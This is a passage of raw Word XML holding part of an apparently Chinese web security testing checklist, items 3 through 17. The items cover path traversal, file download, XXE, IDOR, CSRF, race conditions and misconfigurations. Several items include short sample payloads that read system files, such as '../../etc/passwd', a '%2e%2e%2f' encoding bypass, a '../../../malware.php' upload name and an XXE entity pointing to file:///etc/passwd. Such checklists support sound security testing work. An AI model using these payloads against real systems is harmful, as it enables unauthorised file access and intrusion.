      <w:tr w14:paraId="63BB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1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16692811">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B32C494">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5AC48A4">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5BB6DB1C">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3.任意文件下载</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1100B577">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·构造恶意路径参数（如/download?file=../../etc/passwd），尝试下载敏感文件。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D6BA479">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·使用编码绕过（如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>%2e%2e%2f</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>代替</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>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）探测文件读取漏洞。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2591C18D">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0F841D82">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="955675" cy="440690"/>
                  <wp:effectExtent l="0" t="0" r="15875" b="16510"/>
                  <wp:docPr id="6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1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId26"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="955675" cy="440690"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="42044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7" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D72B09D">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3EE6A47">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5C6FE75B">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7175E84B">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4.目录遍历</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="535D6D05">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·在文件上传功能中尝试上传路径穿越文件名（如../../../malware.php）。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C0B656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·测试Web服务器配置（如Apache </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>AllowOverride</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>设置不当）导致的目录列表暴露。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6C3ED87E">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1729A492">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="958215" cy="564515"/>
                  <wp:effectExtent l="0" t="0" r="13335" b="6985"/>
                  <wp:docPr id="5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0"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId27"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="958215" cy="564515"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7C99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79" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6ACA3945">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B03F198">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115832DB">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7C20234">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5.路径遍历</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FA3BEEA">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注入恶意路径片段（如`/api/load?path=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="47E02286">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625442CA">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="952500" cy="583565"/>
                  <wp:effectExtent l="0" t="0" r="0" b="6985"/>
                  <wp:docPr id="58"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49"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId28"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="952500" cy="583565"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4CF2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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="78B7ED29">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43123DDF">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2DDC7725">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B3645E4">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6.管理后台对外</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C24101F">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·使用目录爆破工具（dirsearch）扫描常见管理路径（如/admin/、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>/wp-admin/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>）。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54A45A34">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·检查是否禁用管理接口的互联网访问（仅限内网</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DD385D4">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IP访问）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36C2097B">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06F9545B">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1EEE6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79" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="152EB64D">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C146DBB">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6C27CE4">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097C94B1">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7.同步错误</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B60FBAF">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·并发请求资源修改接口（如余额提现），验证是否出现超额操作。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E3E2E7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·利用时间窗口漏洞重复提交相同请求（如重复领取优惠券）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="528A4E65">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013BDAD7">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="953770" cy="421640"/>
                  <wp:effectExtent l="0" t="0" r="17780" b="16510"/>
                  <wp:docPr id="53"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4"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId29"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="953770" cy="421640"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3894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1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E9A306F">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C40E319">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0550895">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5FDED0AA">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8.环境错误</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01F7EE17">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·测试开发环境配置误切到生产环境（如.env.prod文件未保护）。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5936EF14">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·验证调试模式（如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>DEBUG=True</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>）是否暴露敏感堆栈信息。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B7EBFE4">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399E27ED">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="951230" cy="638175"/>
                  <wp:effectExtent l="0" t="0" r="1270" b="9525"/>
                  <wp:docPr id="50"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42"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId30"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="951230" cy="638175"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2988B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1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D526B66">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DEF0BEE">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6A9AE8A">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7E89DC4D">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9. cookie设置不当</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09D583F7">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·检查Cookie是否未设置HttpOnly、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>Secure</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>属性（可通过浏览器开发者工具查看）。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3699880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·测试Session Fixation漏洞：未登录前获取固定Session ID，登录后验证是否复用。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B04283E">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42E14CDA">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38E39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79" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="019D768B">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0D950C5">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BFC57BA">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056C2D19">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10. flash 配置不当</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="220AC26B">
            <w:pPr>
              <w:widowControl/>
              <w:ind w:firstLine="210" w:firstLineChars="100"/>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·检查crossdomain.xml文件是否允许任意域访问（如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>&lt;allow-access-from domain="*"/&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>）。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ABE6ED3">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·验证Flash文件（SWF）是否包含敏感硬编码信息（如密钥）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16AE5445">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465F1E93">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12ED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1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="04E4F008">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DD912EF">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6BB84538">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13BF258">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11.中间件配置不当</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33CCF29C">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·检查Nginx/Apache配置是否禁用危险指令（如add_header X-Content-Type-Options缺失）。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58841FF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·验证Tomcat未删除默认管理页面（如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>/manager/html</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>）。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="174472DA">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·验证Tomcat是否存在版本泄漏。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="37F6D243">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7EC3154A">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7050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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31CBE220">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5AEAE9A">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96D4700">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DD346CD">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12.备份文件下载</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D500D2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·扫描常见备份文件名（如web.bak、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>database.sql.zip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>）。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0049AAF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·利用版本控制工具泄露（如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>.git/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>目录未删除导致源码泄露）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2531532D">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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17BB2B3D">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="961390" cy="570230"/>
                  <wp:effectExtent l="0" t="0" r="10160" b="1270"/>
                  <wp:docPr id="5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48"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId31"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="961390" cy="570230"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="18F5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1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="129A4438">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4337CD78">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ED2461D">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3E4FE6EF">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13.不安全的HTTP请求方法</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A5B3059">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·使用OPTIONS方法探测支持的HTTP动词，验证是否禁用危险方法（如PUT、DELETE）。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73D8B859">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·测试TRACE方法是否启用（可能导致跨站追踪攻击）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C252B29">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5A53749A">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4E6E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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="549EA277">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4CB950E">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1223484">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61B073EB">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14.不安全对象直接引用</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57BF973B">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·修改数据库主键参数（如/api/user?id=1001→</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>id=1002</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C199902">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访问他人数据。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4845A483">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·通过枚举UUID或哈希值猜测未授权资源标识符。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="32C51978">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5FC6E6BE">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28D97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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="310A3C2F">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0B39D48">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5A5B490">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1EBAB754">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15. CSRF漏洞</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C17C5B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·构造恶意表单或链接，测试关键操作（如修改密码）是否缺少CSRF Token验证。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="310CD73F">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·检查Token绑定逻辑（如Token未与用户会话绑定）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="54AA6B0B">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4340AE55">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4D75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9" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29CE214E">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3E071BE">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4788002">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6FC71F76">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16.可预测的资源位置</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="450EF717">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·通过递增ID（如/file/1→</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>/file/2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>）遍历未授权访问文件。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DD39B7B">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·测试短链或哈希值是否可逆向推导资源路径。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A006D7E">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20527C61">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7F0B7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1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07B8F0C1">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CF8D6B5">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5151B93E">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2F60C7B">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17</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XML外部实体（XXE）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7449AD3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·在XML请求中注入外部实体（如&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;）。 </w:t>
            </w:r>
          </w:p>
